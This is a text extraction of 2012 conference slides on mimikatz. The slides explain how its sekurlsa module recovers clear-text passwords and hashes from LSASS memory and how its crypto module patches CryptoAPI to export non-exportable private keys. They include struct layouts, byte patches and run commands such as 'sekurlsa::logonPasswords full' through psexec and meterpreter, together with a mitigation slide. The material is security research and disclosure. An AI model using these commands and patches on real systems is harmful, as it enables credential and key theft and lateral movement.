mimikatz @ asfws - gentil kiwi · 2014. 8. 21. · mimikatz working on xp, 2003, vista, 2008,...
Post on 13-Mar-2021
4 Views
Preview:
TRANSCRIPT
mimikatz
Benjamin DELPY `gentilkiwi`focus on sekurlsapass-the-pass
and crypto patches
Who Why
Benjamin DELPY `gentilkiwi`ndash Frenchndash 26yndash Kiwi addictndash Lazy programmer
Started to code mimikatz to ndash explain security concepts ndash improve my knowledge ndash prove to Microsoft that sometimes they must change old habits
Why all in French ndash because Irsquom ndash It limits script kiddies usagendash Hack with class
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 2
mimikatzworking
On XP 2003 Vista 2008 Seven 2008r2 8 Server 8
ndash x86 amp x64ndash 2000 support dropped with mimikatz 10
Everywhere itrsquos statically compiled
Two modes
ndash direct action (local commands) ndash process or driver communication
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 3
sekurlsadll
mimikatzexe
KeyIsolaquo Isolation de cleacute CNG raquo
LSASSEXE
Direct action cryptopatchcng
EventLoglaquo Journal drsquoeacuteveacutenements Windows raquo
SVCHOSTEXE
Direct action diverseventdrop
mimikatzexe
SamSSlaquo Gestionnaire de comptes de seacutecuriteacute raquo
LSASSEXE
VirtualAllocEx WriteProcessMemory CreateRemoteThread
Open a pipeWrite a welcome messageWait commandshellip and return results
mimikatzarchitecture of sekurlsa amp crypto
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 4
mimikatzexe
mod_mimikatz_sekurlsa
mod_mimikatz_nogpo
mod_mimikatz_divers
mod_mimikatz_winmine
mod_mimikatz_impersonate
mod_mimikatz_inject
mod_mimikatz_samdump
mod_mimikatz_standard
mod_mimikatz_crypto
mod_mimikatz_handle
mod_mimikatz_system
mod_mimikatz_service
mod_mimikatz_process
mod_mimikatz_thread
mod_mimikatz_terminalserver
mod_mimikatz_privilege
mod_pipe
mod_inject
mod_memory
mod_parseur
mod_patch
mod_hive
mod_secacl
mod_privilege
mod_process
mod_service
mod_system
mod_thread
mod_ts
mod_text
mod_crypto
mod_cryptoapi
mod_cryptoacng
msv_1_0
tspkg
wdigest
livessp
kerberos
kappfreedll
kelloworlddll
klockdll
mimikatzsys
sekurlsadll
sam
secrets
msv_1_0
wdigest
livessp
kerberos
tspkg
mimikatz sekurlsawhat is it
A module replacement for my previous favorite library
A local module that can read data from the SamSS Service (well known LSASS process)
What sekurlsa module can dump ndash MSV1_0 hashes
ndash TsPkg passwords
ndash Wdigest passwords
ndash LiveSSP passwords
ndash Kerberos passwords ()
ndash hellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 5
mod_mimikatz_sekurlsa
mimikatz sekurlsahow LSA works ( level)
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 6
LsaSSWinLogon
AuthenticationPackagesmsv1_0
tspkg
wdigest
livessp
kerberos
Authentication
msv1_0
kerberos
SAM
ChallengeResponse
userdomainpassword
PLAYSKOOL
mimikatz sekurlsahow LSA works ( level)
Authentication packages
ndash take userrsquos credentials from the logon
ndash make their own stuff
ndash keep enough data in memory to compute responses of challenges (Single Sign On)
If we can get data and inject it in another session of LSASS we avoid authentication part
This is the principle of laquo Pass-the-hash raquo
ndash In fact of laquo Pass-the-x raquo
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 7
PLAYSKOOL
mimikatz sekurlsahistory of laquo pass-the- raquo 12
Pass-the-hashndash 1997 - Unix modified SAMBA client for Hashes usage Paul Ashton (EIGEN)
ndash 2000 - Private version of a Windows laquo LSA Logon Session Editor raquo HernanOchoa (CoreSecurity)
ndash 2007 - TechEd Microsoft Marc Murray (TrueSec) present msvctl and provide some downloads of it
ndash 2007 - laquo Pass the hash toolkit raquo published Hernan Ochoa (CoreSecurity)
ndash 2007 - mimikatz 01 includes pass the hash and is publicly available for x86 amp x64 versions of Windows (yeah by myself but in French so not famous ))
2007 was the year of pass the hash
Pass-the-ticketndash 042011 - wce (pass the hash toolkit evolution) provides Kerberos ticket
support Hernan Ochoa (Ampliasecurity)
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 8
mimikatz sekurlsahistory of laquo pass-the- raquo 22
Pass-the-passndash 052011 ndash mimikatz 10 dumps first clear text passwords from TsPkg provider (but limited to NT
6 and some XP SP3)bull httpbloggentilkiwicomsecuritepass-the-pass
ndash 052011 ndash return of mimikatz it dumps clear text passwords from WDigest provider (unlimited this time ))
bull httpbloggentilkiwicomsecuritere-pass-the-pass
ndash 052011 ndash Some organizations opened cases to Microsoft about ithellip
hellipLots of timehellip
ndash begin of 2012 - Lots of blogs (and Kevin Mitnick )) say few words about mimikatz
ndash 032012 - Hernan Ochoa (Ampliasecurity) publish at seclists that wce support WDigest password extracthellip
bull httpseclistsorgpen-test2012Mar7
ndash 032012 ndash mimikatz strikes again with LiveSSP provider and extracts Live login passwords from Windows 8 memory
bull httpbloggentilkiwicomsecuriterere-pass-the-pass
ndash 032012 ndash yeah once againhellip more curious but Kerberos keeps passwords in memorybull httpbloggentilkiwicomsecuritererere-pass-the-pass
ndash 082012 ndash sekurlsa module without injection at all (ultra safe)bull httpbloggentilkiwicomsecuritemimikatzsekurlsa-fait-son-apparition
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 9
mimikatz sekurlsa tspkg
because sometimes hash is not enoughhellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 10
mimikatz sekurlsa tspkgwhat is it
Microsoft introduces SSO capability for Terminal Server with NT 6 to improve RemoteApps and RemoteDestkop usersrsquosexperiencendash httptechnetmicrosoftcomlibrarycc772108aspx
Rely on CredSSP with Credentials Delegation (= Account delegation)ndash Specs httpdownloadmicrosoftcomdownload95e95ef66af-
9026-4bb0-a41d-a4f81802d92c5Bms-cssp5Dpdf
First impression it seems cool ndash User does not have to type its password
ndash Password is not in RDP file
ndash Password is not in user secrets
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 11
mimikatz sekurlsa tspkgquestions
KB says that for it works we must enable laquo Default credentials raquo delegationndash ldquoDefault credentials The credentials obtained when the user first logs on to
Windowsrdquo - httpsmsdnmicrosoftcomlibrarybb204773aspx
bull What Our UserDomainPassword | Hash | Ticket It seems hellipndash In all cases system seems to be vulnerable to pass-the-hellip
In what form Our specs [MS-CSSP]
ndash 22121 TSPasswordCredsbull The TSPasswordCreds structure contains the users password credentials that are delegated
to the server (or PIN) TSPasswordCreds = SEQUENCE
domainName [0] OCTET STRING userName [1] OCTET STRING password [2] OCTET STRING
ndash Challenge response for authentication bull Serveur YES (TLS Kerberos)bull Client NO password is sent to serverhellip
So password resides somewhere in memory
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 12
mimikatz sekurlsa tspkgsymbols amp theory
Letrsquos explore some symbols
ndash sounds coolhellip (thanks Microsoft)
Letrsquos imagine a scenariondash Enumerate all sessions to obtain
bull Username
bull Domain
bull LUID
ndash Call tspkgTSCredTableLocateDefaultCreds (rely on RtlLookupElementGenericTableAvl) with LUID to obtain
bull TS_CREDENTIAL
ndash Call tspkgTSObtainClearCreds (rely on LsaUnprotectMemory) with TS_CREDENTIAL data (TS_PRIMARY_CREDENTIAL) for
bull TS_PRIMARY_CREDENTIAL with clear text credentialshellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 13
kdgt x tspkgclear75016d1c tspkgTSObtainClearCreds = ltno type informationgtkdgt x tspkgpassword75011b68 tspkgTSDuplicatePassword = ltno type informationgt75011cd4 tspkgTSHidePassword = ltno type informationgt750195ee tspkgTSRevealPassword = ltno type informationgt75012fbd tspkgTSUpdateCredentialsPassword = ltno type informationgtkdgt x tspkglocate7501158b tspkgTSCredTableLocateDefaultCreds = ltno type informationgt
mimikatz sekurlsa tspkgworkflow
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 14
RtlLookupElementGenericTableAvl
LsaUnprotectMemory
KIWI_TS_CREDENTIAL
KIWI_TS_PRIMARY_CREDENTIAL
typedef struct _KIWI_TS_PRIMARY_CREDENTIAL PVOID unk0LSA_UNICODE_STRING DomaineLSA_UNICODE_STRING UserNameLSA_UNICODE_STRING Password
KIWI_TS_PRIMARY_CREDENTIAL PKIWI_TS_PRIMARY_CREDENTIAL
LsaEnumerateLogonSessions
for each LUID
password in clear
tspkgTSGlobalCredTable
typedef struct _KIWI_TS_CREDENTIAL ifdef _M_X64
BYTE unk0[108]elif defined _M_IX86
BYTE unk0[64]endif
LUID LocallyUniqueIdentifierPVOID unk1PVOID unk2PKIWI_TS_PRIMARY_CREDENTIAL pTsPrimary
KIWI_TS_CREDENTIAL PKIWI_TS_CREDENTIALKIWI_TS_CREDEN
TIAL
mimikatz sekurlsa tspkgdemo time
sekurlsatspkg
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 15
mimikatz sekurlsa wdigest
because clear text password over httphttps is not cool
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 16
mimikatz sekurlsa wdigestwhat is it
ldquoDigest access authentication is one of the agreed-upon methods a web server can use to negotiate credentials with a users web browser It applies a hash function to a password before sending it over the network [hellip]rdquoWikipedia httpenwikipediaorgwikiDigest_access_authentication
ldquoCommon Digest Authentication Scenarios ndash Authenticated client access to a Web sitendash Authenticated client access using SASLndash Authenticated client access with integrity protection to a directory service
using LDAPrdquoMicrosoft httptechnetmicrosoftcomlibrarycc778868aspx
Again it seems cool ndash No password over the network just hashesndash No reversible password in Active Directory hashes for each realm
bull Only with Advanced Digest authentication
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 17
mimikatz sekurlsa wdigestwhat is it
We speak about hashes but what hashes H = MD5(HA1nonce[hellip]HA2)
bull HA1 = MD5(usernamerealmpassword)
bull HA2 = MD5(methoddigestURI[hellip])
Even after login HA1 may changehellip realm is from server side and cannot be determined before Windows logon
WDigest provider must have elements to compute responses for different servers ndash Username
ndash Realm (from server)
ndash Password
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 18
mimikatz sekurlsa wdigesttheory
This time we know ndash that WDigest keeps password in memory laquo by protocol raquo for HA1 digestndash that LSASS love to unprotect password with LsaUnprotectMemory (so protect
with LsaProtectMemory)
LsaUnprotectMemoryndash At offset 0xb4 of LSA_SECPKG_FUNCTION_TABLEndash Letrsquos perform a research in WDigest
ndash Hypothesis seems verified
LsaProtectMemoryndash At offset 0xb0 of LSA_SECPKG_FUNCTION_TABLEndash Letrsquos perform a research in WDigest
ndash SpAcceptCredentials takes clear password in argsbull Protect it with LsaProtectMemorybull Update or insert data in double linked list wdigestl_LogSessList
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 19
text7409D151 _DigestCalcHA18 call dword ptr [eax+0B4h]
text74096C69 _SpAcceptCredentials16 call dword ptr [eax+0B0h]
mimikatz sekurlsa wdigestworkflow
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 20
LsaUnprotectMemory
LsaEnumerateLogonSessions
for each LUID
typedef struct _KIWI_WDIGEST_LIST_ENTRY struct _KIWI_WDIGEST_LIST_ENTRY Flinkstruct _KIWI_WDIGEST_LIST_ENTRY BlinkDWORD UsageCountstruct _KIWI_WDIGEST_LIST_ENTRY ThisLUID LocallyUniqueIdentifier[hellip]LSA_UNICODE_STRING UserNameLSA_UNICODE_STRING DomaineLSA_UNICODE_STRING Password[hellip]
KIWI_WDIGEST_LIST_ENTRY PKIWI_WDIGEST_LIST_ENTRY
wdigestl_LogSessList
search linked list for LUID
KIWI_WDIGEST_LIST_ENTRY
password in clear
mimikatz sekurlsa wdigestdemo time
sekurlsawdigest
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 21
mimikatz sekurlsa livessp
because Microsoft was too good in closed networks
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 22
mimikatz sekurlsa livessphow
Actually Irsquove only used logical (empirical) approach to search passwordshellip ndash Protocol reading
ndash Symbols searching
~ Boring ~hellip be more brutal this time make a WinDBG trap
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 23
0 kdgt process 0 0 lsassexePROCESS 83569040 SessionId 0 Cid 0224 Peb 7f43f000 ParentCid 01b4
DirBase 5df58100 ObjectTable 80ce4740 HandleCount ltData Not AccessiblegtImage lsassexe
0 kdgt process i 83569040You need to continue execution (press g ltentergt) for the contextto be switched When the debugger breaks in again you will be inthe new process context0 kdgt gBreak instruction exception - code 80000003 (first chance)ntRtlpBreakWithStatusInstruction814b39d0 cc int 30 kdgt reload userLoading User Symbols0 kdgt bp p $proc lsasrvLsaProtectMemory kc 5 g0 kdgt g
mimikatz sekurlsa livessphow
Letrsquos login with a Live account on Windows 8
After credentials protection LsaApLogonUserEx2 calls LiveCreateLogonSession to insert data in LiveGlobalLogonSessionList (similar to WDigest)
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 24
lsasrvLsaProtectMemorylivesspLiveMakeSupplementalCredlivesspLiveMakeSecPkgCredentialslivesspLsaApLogonUserEx2livesspSpiLogonUserEx2
lsasrvLsaProtectMemorymsv1_0NlpAddPrimaryCredentialmsv1_0SspAcceptCredentialsmsv1_0SpAcceptCredentials
lsasrvLsaProtectMemorytspkgTSHidePasswordtspkgSpAcceptCredentials
1 kdgt uf c livesspLsaApLogonUserEx2livesspLsaApLogonUserEx2 (74781536)[]livesspLsaApLogonUserEx2+0x560 (74781a96)call to livesspLiveCreateLogonSession (74784867)
Our LiveSSP provider
Yeah Pass the Hash capability with Live account toohellip
Live user can logon through RDP via SSO
mimikatz sekurlsa livesspworkflow
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 25
LsaUnprotectMemory
LsaEnumerateLogonSessions
for each LUID
password in clear
typedef struct _KIWI_LIVESSP_LIST_ENTRY struct _KIWI_LIVESSP_LIST_ENTRY Flinkstruct _KIWI_LIVESSP_LIST_ENTRY BlinkPVOID unk0PVOID unk1PVOID unk2PVOID unk3DWORD unk4DWORD unk5PVOID unk6LUID LocallyUniqueIdentifierLSA_UNICODE_STRING UserNamePVOID unk7PKIWI_LIVESSP_PRIMARY_CREDENTIAL suppCreds
KIWI_LIVESSP_LIST_ENTRY PKIWI_LIVESSP_LIST_ENTRY
livesspLiveGlobalLogonSessionList
search linked list for LUID
KIWI_LIVESSP_LIST_ENTRYKIWI_LIVESSP_PRIMARY_CREDENTIAL
typedef struct _KIWI_LIVESSP_PRIMARY_CREDENTIAL DWORD isSuppDWORD unk0LSA_UNICODE_STRING UserNameLSA_UNICODE_STRING DomaineLSA_UNICODE_STRING Password
KIWI_LIVESSP_PRIMARY_CREDENTIAL PKIWI_LIVESSP_PRIMARY_CREDENTIAL
mimikatz sekurlsa
Even if we already have tools for normal accounts are you not curious to test one with this trap
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 26
Me yes
mimikatz sekurlsa kerberos
Letrsquos login normal account
After credentials protection KerbCreateLogonSession calls ndash NT6 KerbInsertOrLocateLogonSession to insert data in
KerbGlobalLogonSessionTable
ndash NT5 KerbInsertLogonSession to insert data in KerbLogonSessionList
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 27
lsasrvLsaProtectMemorykerberosKerbHideKeykerberosKerbCreatePrimaryCredentialskerberosKerbCreateLogonSessionkerberosSpAcceptCredentials
lsasrvLsaProtectMemorykerberosKerbHidePasswordkerberosKerbCreateLogonSessionkerberosSpAcceptCredentials
lsasrvLsaProtectMemorymsv1_0NlpAddPrimaryCredentialmsv1_0SspAcceptCredentialsmsv1_0SpAcceptCredentials
lsasrvLsaProtectMemorywdigestSpAcceptCredentials
lsasrvLsaProtectMemorytspkgTSHidePasswordtspkgSpAcceptCredentials
Kerberos part for password
Kerberos ticket part Maybe )
mimikatz sekurlsa kerberos (nt6)workflow
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 28
RtlLookupElementGenericTableAvl
LsaUnprotectMemory
KIWI_KERBEROS_PRIMARY_CREDENTIAL
typedef struct _KIWI_KERBEROS_PRIMARY_CREDENTIAL
DWORD unk0PVOID unk1PVOID unk2PVOID unk3
ifdef _M_X64BYTE unk4[32]
elif defined _M_IX86BYTE unk4[20]
endifLUID LocallyUniqueIdentifier
ifdef _M_X64BYTE unk5[44]
elif defined _M_IX86BYTE unk5[36]
endifLSA_UNICODE_STRING UserNameLSA_UNICODE_STRING DomaineLSA_UNICODE_STRING Password
KIWI_KERBEROS_PRIMARY_CREDENTIAL PKIWI_KERBEROS_PRIMARY_CREDENTIAL
LsaEnumerateLogonSessions
for each LUID
password in clear
KIWI_KERBEROS_PRIMARY_CREDENTIAL
KerberosKerbGlobalLogonSessionTable
mimikatz sekurlsa kerberos (nt5)workflow
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 29
LsaUnprotectMemory
LsaEnumerateLogonSessions
for each LUID
password in clear
typedef struct _KIWI_KERBEROS_LOGON_SESSION struct _KIWI_KERBEROS_LOGON_SESSION Flinkstruct _KIWI_KERBEROS_LOGON_SESSION Blink DWORD UsageCountPVOID unk0PVOID unk1PVOID unk2DWORD unk3DWORD unk4PVOID unk5PVOID unk6PVOID unk7LUID LocallyUniqueIdentifier
ifdef _M_IX86DWORD unk8
endifDWORD unk9DWORD unk10PVOID unk11DWORD unk12DWORD unk13PVOID unk14PVOID unk15PVOID unk16[hellip]LSA_UNICODE_STRING UserNameLSA_UNICODE_STRING DomaineLSA_UNICODE_STRING Password
KIWI_KERBEROS_LOGON_SESSION PKIWI_KERBEROS_LOGON_SESSION
kerberosKerbLogonSessionList
search linked list for LUID
KIWI_LIVESSP_PRIMARY_CREDENTIAL
mimikatz sekurlsademo time
Final sekurlsa demo sekurlsalogonPasswords full
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 30
mimikatz sekurlsa kerberosldquohu rdquo
Ok It workshellip
But why
Not at all logon on NT5 (can need an unlock)
From my understanding of Microsoft explanations
ndash no need of passwords for the Kerberos protocolhellip
ndash all is based on the hash (not very sexy too)
Microsoftrsquos implementation of Kerberos is full of logicalhellip
ndash For password auth
bull password hash for shared secret but keeping password in memory
ndash For full smartcard auth
bull No password on client
bull No hash on client
ndash NTLM hash on clienthellip
ndash KDC sent it back as a gift
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 31
mimikatz sekurlsa
All passwords in memory are encrypted but in a reversible way to be used
We used LsaUnprotecMemory in the LSASS context to decrypt them
ndash This function rely on LsaEncryptMemory from lsasrvdll
For that we previously inject a DLL (sekurlsadll) in the LSASS process to take benefits of its keys when we called it
Can it be fun to decrypt outside the process ndash Yes it ishellip no more injection just reading memory of LSASS processhellip
mimikatz can use lsasrvdll too and ldquoimportsrdquo LSASS initialized keys ndash When we call LsaEncryptMemory in mimikatz with all keys imported from LSASS we have
the same comportments than when we are in LSASS
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 32
LsaUnprotectMemory
mimikatz sekurlsaLsaEncryptMemory NT5
Depending on the size of the secret LsaEncryptMemory use
ndash RC4
ndash DESx
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 33
g_pRandomKey
g_cbRandomKey
BYTE[g_cbRandomKey]
DWORD 256
BYTE[g_cbRandomKey]
g_pDESXKeyBYTE[144]
BYTE[144]
g_Feedback BYTE[8]
lsass
lsasrv
lsass
lsasrv
mimikatz
lsasrv
copyhellip
mimikatz sekurlsaLsaEncryptMemory NT6
Depending on the size of the secret LsaEncryptMemory use
ndash 3DES
ndash AES
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 34
InitializationVector BYTE[16]
lsass
lsasrv
lsass
lsasrv
mimikatz
copyhellip
h3DesKey
typedef struct _KIWI_BCRYPT_KEY_DATA DWORD sizeDWORD tagDWORD typeDWORD unk0DWORD unk1DWORD unk2DWORD unk3PVOID unk4BYTE data etc
KIWI_BCRYPT_KEY_DATA PKIWI_BCRYPT_KEY_DATA
hAesKey
lsasrv typedef struct _KIWI_BCRYPT_KEY
DWORD sizeDWORD typePVOID unk0PKIWI_BCRYPT_KEY_DATA clePVOID unk1
KIWI_BCRYPT_KEY PKIWI_BCRYPT_KEY
mimikatz sekurlsamemo
Security Packages
Protection Keys
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 35
Package Symbols Type
tspkg tspkgTSGlobalCredTable RTL_AVL_TABLE
wdigest wdigestl_LogSessList LIST_ENTRY
livessp livesspLiveGlobalLogonSessionList LIST_ENTRY
kerberos (nt5) kerberosKerbLogonSessionList LIST_ENTRY
kerberos (nt6) kerberosKerbGlobalLogonSessionTable RTL_AVL_TABLE
msv1_0 lsasrvLogonSessionListlsasrvLogonSessionListCount
LIST_ENTRYULONG
Key NT 5 Symbols
RC4 lsasrvg_cbRandomKeylsasrvg_pRandomKey
DESx lsasrvg_pDESXKeylsasrvg_Feedback
Key NT 6 Symbols
lsasrvInitializationVector
3DES lsasrvh3DesKey
AES lsasrvhAesKey
mimikatz sekurlsamemo
Some commands mimikatz privilegedebug sekurlsalogonPasswords full exit
psexec windows -s -c cmimikatzWin32mimikatzexe sekurlsalogonPasswords full exit
meterpreter gt execute -H -c -i -m -f pentestpasswordsmimikatzmimikatz_x86exe
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 36
mimikatz 10 x64 (RC) Traitement du Kiwi (Aug 2 2012 013228) httpbloggentilkiwicommimikatz
mimikatz privilegedebugDemande dACTIVATION du privilegravege SeDebugPrivilege OK
mimikatz sekurlsalogonPasswords full
Authentification Id 0234870Package dauthentification NTLMUtilisateur principal Gentil KiwiDomaine dauthentification vm-w8-rp-x
msv1_0 Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Hash LM d0e9aee149655a6075e4540af1f22d3b Hash NTLM cc36cf7a8514893efccd332446158b1a
kerberos Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234
wdigest Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234
tspkg Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234
livessp nt (LUID KO)
mimikatz sekurlsawhat we can do
Basicsndash No physical access to computer (first step to pass the hash then pass the pass)ndash No admin rights system rights debug privileges (hellip)ndash Disable local admin accountsndash Strong passwords (haha it was a joke so useless )ndash For privileged account network login instead of interactive (when possible)ndash Audit pass the hash keeps traces and can lock accountsndash No admin rights system rights debug privileges even VIPndash Use separated network (or forest) for privileged tasks
More in depthndash Force strong authentication (SmartCard amp Token) $ eurondash Short validity for Kerberos ticketsndash No delegationndash Disable NTLM (available with NT6)ndash No exotic
bull biometrics (it keeps password somewhere and push it to Windows)bull single sign on
ndash Stop shared secrets for authentication push Public Private stuff (like keys ))ndash Let opportunities to stop retro compatibilityndash Disable faulty providers
bull Is it supported by Microsoft bull Even if you can disable LiveSSP TsPkg and WDigest will you disable Kerberos and msv1_0
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 37
mimikatz cryptowhat is it
A little module that I wrote to ndash play with Windows Cryptographic API CNG and RSA keys
ndash automate export of certificateskeysbull Even those which are ldquonotrdquo exportable
What crypto module can do ndash List
bull Providers
bull Stores
bull Certificates
bull Keys
ndash Exportbull Certificates
ndash public in DER format
ndash with private keys in PFX format
bull Private keys in PVK format ndash itrsquos cool OpenSSL can deal with it too
ndash Patchbull CryptoAPI in mimikatz context
bull CNG in LSASS context (again )
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 38
mod_mimikatz_crypto
mimikatz cryptohow itrsquos protected
Private keys are DPAPI protectedndash You cannot reuse private key files on another computer
bull At least without the master keys andor password of users
ComputerUser can load their own keys because they have enough secrets to do it (ex session opened)ndash Yes a computerserver open a ldquosessionrdquo
ExportUsage can be limited by ndash Password
ndash Popup
ndash ExportArchive flag no present
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 39
Constraint for most userUnavailable for computer keys
certutil -importpfx mycertp12 NoExportcertutil -csp Microsoft Enhanced Cryptographic Provider v10 -importpfx mycertp12 NoExport
mimikatz crypto capihow it works
ldquoMicrosoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules CSPs perform all cryptographic operations and manage private keys CSPs can be implemented in software as well as in hardwarerdquondash httptechnetmicrosoftcomlibrarycc962093aspx
Processes (mimikatz IIS Active Directory Internet Explorer yourappsherehellip) load some DLL to deal with different cryptographic stuff CSP (keys) smartcard reader hellipndash cryptdlldll rsaenhdll hellip
Process deal with cryptographic keys by this APIhellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 40
mimikatz crypto capihow itrsquos exported ( level)
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 41
Process
CryptoAPI and RSA CSP
Exportable
Load Private Key
Exported Key
yes
NTE_BAD_KEY_STATE
no
DPAPI Decode
PLAYSKOOL
Ask to export Key
mimikatz crypto patchcapibecause I own my process
When we want to export a certificate with its private key (or only the key) it goes in rsaenhCPExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 42
mimikatz cryptoexportCertificatesEmplacement CERT_SYSTEM_STORE_CURRENT_USERMy
- Benjamin DelpyContainer Cleacute 470ADFBA-8718-4014-B05E-B30776B75A03Provider Microsoft Enhanced Cryptographic Provider v10Type AT_KEYEXCHANGEExportabiliteacute NONTaille cleacute 2048Export priveacute dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpypfx KO
(0x8009000b) Cleacute non valide pour lutilisation dans leacutetat speacutecifieacuteExport public dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpyder OK
================ Certificat 0 ================Numeacutero de seacuterie 112169417a1c3ef46a301f99385f50680fa0Eacutemetteur CN=GlobalSign CodeSigning CA - G2 O=GlobalSign nv-sa C=BEObjet CN=Benjamin Delpy C=FRIl ne sagit pas dun certificat racineHach cert (sha1) ab 9e 92 b9 43 ed 47 d9 15 bc 26 93 9e 24 a5 83 03 ac aa 7e
Conteneur de cleacute = 470ADFBA-8718-4014-B05E-B30776B75A03Fournisseur = Microsoft Enhanced Cryptographic Provider v10
La cleacute priveacutee NE PEUT PAS ecirctre exporteacuteeSuccegraves du test de cryptageCertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813)CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute
Exportable
mimikatz crypto patchcapibecause I own my process
So what A module in my own process return that I canrsquot do something CryptoAPI is in my memory space letrsquos patch it
I wrote ldquo4rdquo bytes in my memory space
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 43
text0AC0B7CB 0F 85 33 C7 FF FF jnz continue_key_export_or_archive
text0AC0B7CB 90 nop
text0AC0B7CC E9 33 C7 FF FF jmp continue_key_export_or_archive
text0AC1F749 0F 85 B6 3B FF FF jnz continue_key_export_or_archive_prepare
text0AC1F749 90 nop
text0AC1F74A E9 B6 3B FF FF jmp continue_key_export_or_archive_prepare
mimikatz crypto patchcapidemo time
Import export import as not exportablehellip export
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 44
mimikatz crypto patchcapilimitations
Because ndash Irsquom lazy
ndash Irsquove seen in majority of case RSA keys for real life usebull Elliptic Curve a littlehellip
mimikatz cryptopatchcapi only deal with ndash Microsoft Base Cryptographic Provider v10
ndash Microsoft Enhanced Cryptographic Provider v10
ndash Microsoft Enhanced RSA and AES Cryptographic Provider
ndash Microsoft RSA SChannel Cryptographic Provider
ndash Microsoft Strong Cryptographic Provider
hellipall based on rsaenhdll
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 45
mimikatz crypto cnghow it works
ldquoCryptography API Next Generation (CNG) is the long-term replacement for the CryptoAPI CNG is designed to be extensible at many levels and cryptography agnostic in behaviorrdquondash httpmsdnmicrosoftcomlibrarywindowsdesktopaa376210aspx
